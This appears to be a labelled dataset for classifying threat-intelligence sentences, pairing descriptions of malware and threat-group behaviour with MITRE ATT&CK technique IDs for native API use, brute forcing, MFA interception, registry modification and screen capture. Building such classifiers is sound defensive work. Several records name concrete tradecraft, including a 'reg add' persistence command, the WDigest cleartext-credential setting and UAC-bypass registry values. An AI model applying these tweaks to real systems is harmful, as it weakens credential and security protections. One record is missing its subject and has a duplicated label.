{"text1":"GrimAgent can use Native API including \"GetProcAddress\" and \"ShellExecuteW\".","labels":"['T1106']"}
|
|
{"text1":"GuLoader can use a number of different APIs for discovery and execution.","labels":"['T1106']"}
|
|
{"text1":"HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.","labels":"['T1106']"}
|
|
{"text1":"Hancitor has used \"CallWindowProc\" and \"EnumResourceTypesA\" to interpret and execute shellcode.","labels":"['T1106']"}
|
|
{"text1":"HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bytes of data.","labels":"['T1106']"}
|
|
{"text1":"Higaisa has called various native OS APIs.","labels":"['T1106']"}
|
|
{"text1":"HotCroissant can perform dynamic DLL importing and API lookups using \"LoadLibrary\" and \"GetProcAddress\" on obfuscated strings.","labels":"['T1106']"}
|
|
{"text1":"HyperBro has the ability to run an application (\"CreateProcessW\") or script\/file (\"ShellExecuteW\") via API.","labels":"['T1106']"}
|
|
{"text1":"HyperStack can use the Windows APIs \"ConnectNamedPipe\" and \"WNetAddConnection2\" to detect incoming connections and connect to remote shares.","labels":"['T1106']"}
|
|
{"text1":"IcedID has called \"ZwWriteVirtualMemory\", \"ZwProtectVirtualMemory\", \"ZwQueueApcThread\", and \"NtResumeThread\" to inject itself into a remote process.","labels":"['T1106']"}
|
|
{"text1":"InvisiMole can use winapiexec tool for indirect execution of \"ShellExecuteW\" and \"CreateProcessA\".","labels":"['T1106']"}
|
|
{"text1":"KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution.","labels":"['T1106']"}
|
|
{"text1":"KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine.","labels":"['T1106']"}
|
|
{"text1":"Lazarus Group has used the Windows API \"ObtainUserAgentString\" to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.","labels":"['T1106']"}
|
|
{"text1":"LightNeuron is capable of starting a process using CreateProcess.","labels":"['T1106']"}
|
|
{"text1":"Lizar has used various Windows API functions on a victim's machine.","labels":"['T1106']"}
|
|
{"text1":"MacMa has used macOS API functions to perform tasks.","labels":"['T1106']"}
|
|
{"text1":"MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.","labels":"['T1106']"}
|
|
{"text1":"Metamorfo has used native WINAPI calls.","labels":"['T1106']"}
|
|
{"text1":"Milan can use the API `DnsQuery_A` for DNS resolution.","labels":"['T1106']"}
|
|
{"text1":"Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`.","labels":"['T1106']"}
|
|
{"text1":"NETWIRE can use Native API including \"CreateProcess\", \"GetProcessById\", and \"WriteProcessMemory\".","labels":"['T1106']"}
|
|
{"text1":"Nebulae has the ability to use \"CreateProcess\" to execute a process.","labels":"['T1106']"}
|
|
{"text1":"Netwalker can use Windows API functions to inject the ransomware DLL.","labels":"['T1106']"}
|
|
{"text1":"PLEAD can use `ShellExecute` to execute applications.","labels":"['T1106']"}
|
|
{"text1":"PcShare has used a variety of Windows API functions.","labels":"['T1106']"}
|
|
{"text1":"Pillowmint has used multiple native Windows APIs to execute and conduct process injections.","labels":"['T1106']"}
|
|
{"text1":"PipeMon's first stage has been executed by a call to \"CreateProcess\" with the decryption password in an argument. PipeMon has used a call to \"LoadLibrary\" to load its installer.","labels":"['T1106']"}
|
|
{"text1":"PolyglotDuke can use \"LoadLibraryW\" and \"CreateProcess\" to load and execute code.","labels":"['T1106']"}
|
|
{"text1":"Pteranodon has used various API calls.","labels":"['T1106']"}
|
|
{"text1":"QakBot can use \"GetProcAddress\" to help delete malicious strings from memory.","labels":"['T1106']"}
|
|
{"text1":"RCSession can use WinSock API for communication including \"WSASend\" and \"WSARecv\".","labels":"['T1106']"}
|
|
{"text1":"REvil can use Native API for execution and to retrieve active services.","labels":"['T1106']"}
|
|
{"text1":"ROKRAT can use a variety of API calls to execute shellcode.","labels":"['T1106']"}
|
|
{"text1":"Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.","labels":"['T1106']"}
|
|
{"text1":"SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.","labels":"['T1106']"}
|
|
{"text1":"SUNSPOT used Windows API functions such as \"MoveFileEx\" and \"NtQueryInformationProcess\" as part of the SUNBURST injection process.","labels":"['T1106']"}
|
|
{"text1":"Sharpshooter's first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA().","labels":"['T1106']"}
|
|
{"text1":"ShimRat has used Windows API functions to install the service and shim.","labels":"['T1106']"}
|
|
{"text1":"ShimRatReporter used several Windows API functions to gather information from the infected system.","labels":"['T1106']"}
|
|
{"text1":"SideCopy has executed malware by calling the API function `CreateProcessW`.","labels":"['T1106']"}
|
|
{"text1":"SideTwist can use \"GetUserNameW\", \"GetComputerNameW\", and \"GetComputerNameExW\" to gather information.","labels":"['T1106']"}
{"text1":"Siloscape makes various native API calls.","labels":"['T1106']"}
{"text1":"SodaMaster can use \"RegOpenKeyW\" to access the Registry.","labels":"['T1106']"}
{"text1":"SombRAT has the ability to respawn itself using \"ShellExecuteW\" and \"CreateProcessW\".","labels":"['T1106']"}
{"text1":"Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.","labels":"['T1106']"}
{"text1":"SynAck parses the export tables of system DLLs to locate and call various Windows API functions.","labels":"['T1106']"}
{"text1":"The file collection tool used by RainyDay can utilize native API including \"ReadDirectoryChangeW\" for folder monitoring.","labels":"['T1106']"}
{"text1":"ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration.","labels":"['T1106']"}
{"text1":"Torisma has used various Windows API calls.","labels":"['T1106']"}
{"text1":"Turla and its RPC backdoors have used API calls for various tasks related to subverting AMSI and accessing and then executing commands through RPC and\/or named pipes.","labels":"['T1106']"}
{"text1":"Ursnif has used \"CreateProcessW\" to create child processes.","labels":"['T1106']"}
{"text1":"Volgmer executes payloads using the Windows API call CreateProcessW().","labels":"['T1106']"}
{"text1":"WarzoneRAT can use a variety of API calls on a compromised host.","labels":"['T1106']"}
{"text1":"WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.","labels":"['T1106']"}
{"text1":"Waterbear can leverage API functions for execution.","labels":"['T1106']"}
{"text1":"WhisperGate has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes.","labels":"['T1106']"}
{"text1":"WindTail can invoke Apple APIs \"contentsOfDirectoryAtPath\", \"pathExtension\", and (string) \"compare\".","labels":"['T1106']"}
{"text1":"Winnti for Windows can use Native API to create a new process and to start services.","labels":"['T1106']"}
{"text1":"ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`.","labels":"['T1106']"}
{"text1":"build_downer has the ability to use the \"WinExec\" API to execute malware on a compromised host.","labels":"['T1106']"}
{"text1":"menuPass has used native APIs including \"GetModuleFileName\", \"lstrcat\", \"CreateFile\", and \"ReadFile\".","labels":"['T1106']"}
{"text1":"xCaon has leveraged native OS function calls to retrieve the victim's network adapter information using the GetAdapterInfo() API.","labels":"['T1106']"}
{"text1":"APT34 has used brute force techniques to obtain credentials.","labels":"['T1110']"}
{"text1":"APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.","labels":"['T1110']"}
{"text1":"APT39 has used Ncrack to reveal credentials.","labels":"['T1110']"}
{"text1":"Caterpillar WebShell has a module to perform brute force attacks on a system.","labels":"['T1110']"}
{"text1":"Chaos conducts brute force attacks against SSH services to gain initial access.","labels":"['T1110']"}
{"text1":"Dragonfly dropped and executed Hydra, a password cracker.","labels":"['T1110']"}
{"text1":"FIN5 has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.","labels":"['T1110']"}
{"text1":"Fox Kitten has brute forced RDP credentials.","labels":"['T1110']"}
{"text1":"HEXANE has used brute force attacks to compromise valid credentials.","labels":"['T1110']"}
{"text1":"Kinsing has attempted to brute force hosts over SSH.","labels":"['T1110']"}
{"text1":"Lazarus Group has performed brute force attacks against administrator accounts.","labels":"['T1110']"}
{"text1":"OilRig has used brute force techniques to obtain credentials.","labels":"['T1110']"}
{"text1":"Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.","labels":"['T1110']"}
{"text1":"QakBot can conduct brute force attacks to capture credentials.","labels":"['T1110']"}
{"text1":"APT28 has used a brute-force\/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.","labels":"['T1110.001']"}
{"text1":"China Chopper's server component can perform brute force password guessing against authentication portals.","labels":"['T1110.001']"}
{"text1":"CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network.","labels":"['T1110.001']"}
{"text1":"Emotet has been observed using a hard coded list of passwords to brute force user accounts.","labels":"['T1110.001']"}
{"text1":"HermeticWizard can use a list of hardcoded credentials in an attempt to authenticate to SMB shares.","labels":"['T1110.001']"}
{"text1":"Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords.","labels":"['T1110.001']"}
{"text1":"P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.","labels":"['T1110.001']"}
{"text1":"Pony has used a small dictionary of common passwords against a collected list of local accounts.","labels":"['T1110.001']"}
{"text1":"SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.","labels":"['T1110.001']"}
{"text1":"Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.","labels":"['T1110.001']"}
{"text1":"APT3 has been known to brute force password hashes to be able to leverage plain text credentials.","labels":"['T1110.002']"}
{"text1":"APT41 performed password brute-force attacks on the local admin account.","labels":"['T1110.002']"}
{"text1":"Dragonfly 2.0 dropped and executed tools used for password cracking, including Hydra and CrackMapExec.","labels":"['T1110.002']"}
{"text1":"Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.","labels":"['T1110.002']"}
{"text1":"During Night Dragon, threat actors used Cain & Abel to crack password hashes.","labels":"['T1110.002']"}
{"text1":"FIN6 has extracted password hashes from ntds.dit to crack offline.","labels":"['T1110.002']"}
{"text1":"Net Crawler uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.","labels":"['T1110.002']"}
{"text1":"APT28 has used a brute-force\/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.","labels":"['T1110.003']"}
{"text1":"APT29 has conducted brute force password spray attacks.","labels":"['T1110.003']"}
{"text1":"APT33 has used password spraying to gain access to target systems.","labels":"['T1110.003']"}
{"text1":"Bad Rabbit\u2019s \"infpub.dat\" file uses NTLM login credentials to brute force Windows machines.","labels":"['T1110.003']"}
{"text1":"Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.","labels":"['T1110.003']"}
{"text1":"CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password.","labels":"['T1110.003']"}
{"text1":"HEXANE has used password spraying attacks to obtain valid credentials.","labels":"['T1110.003']"}
{"text1":"Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.","labels":"['T1110.003']"}
{"text1":"Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.","labels":"['T1110.003']"}
{"text1":"Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.","labels":"['T1110.003']"}
{"text1":"Sandworm Team has used a script to attempt RPC authentication against a number of hosts.","labels":"['T1110.003']"}
{"text1":"Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.","labels":"['T1110.003']"}
{"text1":"Chimera has used credential stuffing against victim's remote services to obtain valid accounts.","labels":"['T1110.004']"}
{"text1":"TrickBot uses a brute-force attack against RDP with its rdpscanDll module.","labels":"['T1110.004']"}
{"text1":"Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.","labels":"['T1111']"}
{"text1":"LAPSUS$ has replayed stolen session tokens and passwords to trigger simple-approval MFA prompts in the hope that the legitimate user will grant the necessary approval.","labels":"['T1111']"}
{"text1":"Operation Wocao has used a custom collection method to intercept two-factor authentication soft tokens.","labels":"['T1111']"}
{"text1":"Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.","labels":"['T1111']"}
{"text1":"A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.","labels":"['T1112']"}
{"text1":"ADVSTORESHELL is capable of setting and deleting Registry values.","labels":"['T1112']"}
{"text1":"APT19 uses a Port 22 malware variant to modify several Registry keys.","labels":"['T1112']"}
{"text1":"APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.","labels":"['T1112']"}
{"text1":"Agent Tesla can achieve persistence by modifying Registry key entries.","labels":"['T1112']"}
{"text1":"Amadey has overwritten registry keys for persistence.","labels":"['T1112']"}
{"text1":"Attor's dispatcher can modify the Run registry key.","labels":"['T1112']"}
{"text1":"BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.","labels":"['T1112']"}
{"text1":"BADCALL modifies the firewall Registry key \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List\".","labels":"['T1112']"}
{"text1":"Bankshot writes data into the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj\".","labels":"['T1112']"}
{"text1":"BitPaymer can set values in the Registry to help in execution.","labels":"['T1112']"}
{"text1":"Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.","labels":"['T1112']"}
{"text1":"CSPY Downloader can write to the Registry under the \"%windir%\" variable to execute tasks.","labels":"['T1112']"}
{"text1":"Cardinal RAT sets \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" to point to its executable.","labels":"['T1112']"}
{"text1":"Caterpillar WebShell has a command to modify a Registry key.","labels":"['T1112']"}
{"text1":"CharmPower can remove persistence-related artifacts from the Registry.","labels":"['T1112']"}
{"text1":"Clambling can set and delete Registry keys.","labels":"['T1112']"}
{"text1":"Clop can make modifications to Registry keys.","labels":"['T1112']"}
{"text1":"ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.","labels":"['T1112']"}
{"text1":"Conficker adds keys to the Registry at \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\" and various other Registry locations.","labels":"['T1112']"}
{"text1":"CrackMapExec can create a registry key using wdigest.","labels":"['T1112']"}
{"text1":"Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number.","labels":"['T1112']"}
{"text1":"DCSrv has created Registry keys for persistence.","labels":"['T1112']"}
{"text1":"During Operation Honeybee, the threat actors used batch files that modified registry keys.","labels":"['T1112']"}
{"text1":"EVILNUM can make modifications to the Registry for persistence.","labels":"['T1112']"}
{"text1":"Earth Lusca modified the registry using the command \"reg add \u201cHKEY_CURRENT_USER\\Environment\u201d \/v UserInitMprLogonScript \/t REG_SZ \/d \u201c[file path]\u201d\" for persistence.","labels":"['T1112']"}
{"text1":"Ember Bear has used an open source batch script to modify Windows Defender registry keys.","labels":"['T1112']"}
{"text1":"Exaramel for Windows adds the configuration to the Registry in XML format.","labels":"['T1112']"}
{"text1":"Explosive has a function to write itself to Registry values.","labels":"['T1112']"}
{"text1":"FELIXROOT deletes the Registry key \"HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open\".","labels":"['T1112']"}
{"text1":"Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.","labels":"['T1112']"}
{"text1":"Gelsemium has the ability to store its components in the Registry.","labels":"['T1112']"}
{"text1":"Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under \"HKCU\\Software\\Microsoft\\Office\\\".","labels":"['T1112']"}
{"text1":"Grandoreiro can store its configuration in the Registry at \"HKCU\\Software\\\" under frequently changing names including \"%USERNAME%\" and \"ToolTech-RM\".","labels":"['T1112']"}
{"text1":"GreyEnergy modifies conditions in the Registry and adds keys.","labels":"['T1112']"}
{"text1":"HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.","labels":"['T1112']"}
{"text1":"HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.","labels":"['T1112']"}
{"text1":"Honeybee uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.","labels":"['T1112']"}
{"text1":"Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys.","labels":"['T1112']"}
{"text1":"HyperStack can add the name of its communication pipe to \"HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes\".","labels":"['T1112']"}
{"text1":"InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.","labels":"['T1112']"}
{"text1":"KEYMARBLE has a command to create Registry entries for storing data under \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath\".","labels":"['T1112']"}
{"text1":"KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.","labels":"['T1112']"}
{"text1":"Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence.","labels":"['T1112']"}
{"text1":"LoJax has modified the Registry key \"\u2018HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute\u2019\" from \"\u2018autocheck autochk *\u2019\" to \"\u2018autocheck autoche *\u2019\".","labels":"['T1112']"}
{"text1":"Magic Hound has modified Registry settings for security tools.","labels":"['T1112']"}
{"text1":"MegaCortex has added entries to the Registry for ransom contact information.","labels":"['T1112']"}
{"text1":"Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.","labels":"['T1112']"}
{"text1":"Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\" with a path to the launcher.","labels":"['T1112']"}
{"text1":"NETWIRE stores its configuration file within the Registry.","labels":"['T1112']"}
{"text1":"NanoCore has the capability to edit the Registry.","labels":"['T1112']"}
{"text1":"Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer`.","labels":"['T1112']"}
{"text1":"Nerex creates a Registry subkey that registers a new service.","labels":"['T1112', 'T1543.003']"}
{"text1":"Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy\" to 1.","labels":"['T1112']"}
{"text1":"Operation Wocao has enabled Wdigest by changing the registry value from 0 to 1.","labels":"['T1112']"}
{"text1":"Orz can perform Registry operations.","labels":"['T1112']"}
{"text1":"PHOREAL is capable of manipulating the Registry.","labels":"['T1112']"}
{"text1":"PLAINTEE uses \"reg add\" to add a Registry Run key for persistence.","labels":"['T1112']"}
{"text1":"Pillowmint has stored its malicious payload in the registry key \"HKLM\\SOFTWARE\\Microsoft\\DRM\".","labels":"['T1112']"}
{"text1":"PipeMon has stored its encrypted payload in the Registry.","labels":"['T1112']"}
{"text1":"PlugX has a module to create, delete, or modify Registry keys.","labels":"['T1112']"}
{"text1":"PoetRAT has made registry modifications to alter its behavior upon execution.","labels":"['T1112']"}
{"text1":"PoisonIvy creates a Registry subkey that registers a new system device.","labels":"['T1112']"}
{"text1":"PolyglotDuke can write encrypted JSON configuration files to the Registry.","labels":"['T1112']"}
{"text1":"PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.","labels":"['T1112']"}
{"text1":"QuasarRAT has a command to edit the Registry on the victim\u2019s machine.","labels":"['T1112']"}
{"text1":"REvil can save encryption parameters and system information to the Registry.","labels":"['T1112']"}
{"text1":"ROKRAT can modify the `HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\` registry key so it can bypass the VB object model (VBOM) on a compromised host.","labels":"['T1112']"}
{"text1":"Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.","labels":"['T1112']"}
{"text1":"RegDuke can store its encryption key in the Registry.","labels":"['T1112']"}
{"text1":"Regin appears to have functionality to modify remote Registry information.","labels":"['T1112']"}
{"text1":"Remcos has full control of the Registry, including the ability to modify it.","labels":"['T1112']"}
{"text1":"Rover has functionality to remove Registry Run key persistence as a cleanup procedure.","labels":"['T1112']"}
{"text1":"SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).","labels":"['T1112']"}
{"text1":"SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.","labels":"['T1112']"}
{"text1":"SOUNDBITE is capable of modifying the Registry.","labels":"['T1112']"}
{"text1":"SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their \"HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start\" registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.","labels":"['T1112']"}
{"text1":"ShimRat has registered two registry keys for shim databases.","labels":"['T1112']"}
{"text1":"Sibot has installed a second-stage script in the \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\" registry key.","labels":"['T1112']"}
{"text1":"Silence can create, delete, or modify a specified Registry key or value.","labels":"['T1112']"}
{"text1":"SynAck can manipulate Registry keys.","labels":"['T1112']"}
{"text1":"SysUpdate can write its configuration file to \"Software\\Classes\\scConfig\" in either \"HKEY_LOCAL_MACHINE\" or \"HKEY_CURRENT_USER\".","labels":"['T1112']"}
{"text1":"TA505 has used malware to disable Windows Defender through modification of the Registry.","labels":"['T1112']"}
{"text1":"TYPEFRAME can install encrypted configuration data under the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\" and \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\".","labels":"['T1112']"}
{"text1":"Taidoor has the ability to modify the Registry on compromised hosts using \"RegDeleteValueA\" and \"RegCreateKeyExA\".","labels":"['T1112']"}
{"text1":"TajMahal can set the \"KeepPrintedJobs\" attribute for configured printers in \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\" to enable document stealing.","labels":"['T1112']"}
{"text1":"Tarrask is able to delete the Security Descriptor (`SD`) registry subkey in order to \u201chide\u201d scheduled tasks.","labels":"['T1112']"}
{"text1":"ThreatNeedle can save its configuration data as the following RC4-encrypted Registry key: `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`.","labels":"['T1112']"}
{"text1":"TinyTurla can set its configuration parameters in the Registry.","labels":"['T1112']"}
{"text1":"TrickBot can modify registry entries.","labels":"['T1112']"}
{"text1":"Turla has used the Registry to store encrypted payloads.","labels":"['T1112']"}
{"text1":"Valak has the ability to modify the Registry key \"HKCU\\Software\\ApplicationContainer\\Appsw64\" to store information regarding the C2 server and downloads.","labels":"['T1112']"}
{"text1":"Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\".","labels":"['T1112']"}
{"text1":"WarzoneRAT can create `HKCU\\Software\\Classes\\Folder\\shell\\open\\command` as a new registry key during privilege escalation.","labels":"['T1112']"}
{"text1":"WastedLocker can modify registry values within the \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\" registry key.","labels":"['T1112']"}
{"text1":"Waterbear has deleted certain values from the Registry to load a malicious DLL.","labels":"['T1112']"}
{"text1":"Wizard Spider has modified the Registry key \"HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" by setting the \"UseLogonCredential\" registry value to \"1\" in order to force credentials to be stored in clear text in memory.","labels":"['T1112']"}
{"text1":"Zeus Panda modifies several Registry keys under \"HKCU\\Software\\Microsoft\\Internet Explorer\\ PhishingFilter\\\" to disable phishing filters.","labels":"['T1112']"}
{"text1":"creates a Registry subkey that registers a new system device.","labels":"['T1112', 'T1112']"}
{"text1":"njRAT can create, delete, or modify a specified Registry key or value.","labels":"['T1112']"}
{"text1":"zwShell can modify the Registry.","labels":"['T1112']"}
{"text1":"A JHUHUGIT variant takes screenshots by simulating the user pressing the \"Take Screenshot\" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.","labels":"['T1113']"}
{"text1":"A variant of Zebrocy captures screenshots of the victim\u2019s machine in JPEG and BMP format.","labels":"['T1113']"}
{"text1":"APT28 has used tools to take screenshots from victims.","labels":"['T1113']"}
{"text1":"APT34 has a tool called CANDYKING to capture a screenshot of the user's desktop.","labels":"['T1113']"}
{"text1":"APT39 has used a screen capture utility to take screenshots on a compromised host.","labels":"['T1113']"}
{"text1":"Agent Tesla can capture screenshots of the victim\u2019s desktop.","labels":"['T1113']"}
{"text1":"AppleSeed can take screenshots on a compromised host by calling a series of APIs.","labels":"['T1113']"}
{"text1":"Aria-body has the ability to capture screenshots on compromised hosts.","labels":"['T1113']"}
{"text1":"Attor has a plugin that captures screenshots of the target applications.","labels":"['T1113']"}
{"text1":"Azorult can capture screenshots of the victim\u2019s machines.","labels":"['T1113']"}
{"text1":"BADNEWS has a command to take a screenshot and send it to the C2 server.","labels":"['T1113']"}
{"text1":"BISCUIT has a command to periodically take screenshots of the system.","labels":"['T1113']"}
{"text1":"BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.","labels":"['T1113']"}
{"text1":"BRONZE BUTLER has used a tool to capture screenshots.","labels":"['T1113']"}
{"text1":"BadPatch captures screenshots in .jpg format and then exfiltrates them.","labels":"['T1113']"}
{"text1":"Bandook is capable of taking an image of and uploading the current desktop.","labels":"['T1113']"}
{"text1":"BlackEnergy is capable of taking screenshots.","labels":"['T1113']"}
{"text1":"Cadelspy has the ability to capture screenshots and webcam photos.","labels":"['T1113']"}
{"text1":"Cannon can take a screenshot of the desktop.","labels":"['T1113']"}
{"text1":"Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server.","labels":"['T1113']"}
{"text1":"Cardinal RAT can capture screenshots.","labels":"['T1113']"}
{"text1":"Catchamas captures screenshots based on specific keywords in the window\u2019s title.","labels":"['T1113']"}
{"text1":"Chaes can capture screenshots of the infected machine.","labels":"['T1113']"}
{"text1":"Chrommme has the ability to capture screenshots.","labels":"['T1113']"}
{"text1":"Clambling has the ability to capture screenshots.","labels":"['T1113']"}
{"text1":"Cobalt Strike's \"beacon\" payload is capable of capturing screenshots.","labels":"['T1113']"}
{"text1":"Cobalt Strike's Beacon payload is capable of capturing screenshots.","labels":"['T1113']"}
{"text1":"ConnectWise can take screenshots on remote hosts.","labels":"['T1113']"}
{"text1":"CosmicDuke takes periodic screenshots and exfiltrates them.","labels":"['T1113']"}
{"text1":"Crimson contains a command to perform screen captures.","labels":"['T1113']"}
{"text1":"CrossRAT is capable of taking screen captures.","labels":"['T1113']"}
{"text1":"DOGCALL is capable of capturing screenshots of the victim's machine.","labels":"['T1113']"}
{"text1":"Dark Caracal took screenshots using their Windows malware.","labels":"['T1113']"}
{"text1":"Daserf can take screenshots.","labels":"['T1113']"}
{"text1":"Derusbi is capable of performing screen captures.","labels":"['T1113']"}
{"text1":"Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
{"text1":"Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
{"text1":"Dragonfly has performed screen captures of victims.","labels":"['T1113']"}
{"text1":"DustySky captures PNG screenshots of the main screen.","labels":"['T1113']"}
{"text1":"Empire is capable of capturing screenshots on Windows and macOS systems.","labels":"['T1113']"}
{"text1":"EvilGrab has the capability to capture screenshots.","labels":"['T1113']"}
{"text1":"FinFisher takes a screenshot of the screen and displays it on top of all other windows for a few seconds in an apparent attempt to hide some messages shown by the system during the setup process.","labels":"['T1113']"}
{"text1":"FlawedAmmyy can capture screenshots.","labels":"['T1113']"}
{"text1":"FruitFly takes screenshots of the user's desktop.","labels":"['T1113']"}
{"text1":"GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.","labels":"['T1113']"}
{"text1":"HALFBAKED can obtain screenshots from the victim.","labels":"['T1113']"}
{"text1":"HotCroissant has the ability to do real time screen viewing on an infected host.","labels":"['T1113']"}
{"text1":"Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.","labels":"['T1113']"}
{"text1":"HyperBro has the ability to take screenshots.","labels":"['T1113']"}
{"text1":"InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.","labels":"['T1113']"}
{"text1":"Janicab captured screenshots and sent them out to a C2 server.","labels":"['T1113']"}
{"text1":"KONNI can take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"Kasidet has the ability to initiate keylogging and screen captures.","labels":"['T1113']"}
{"text1":"Kivars has the ability to capture screenshots on the infected host.","labels":"['T1113']"}
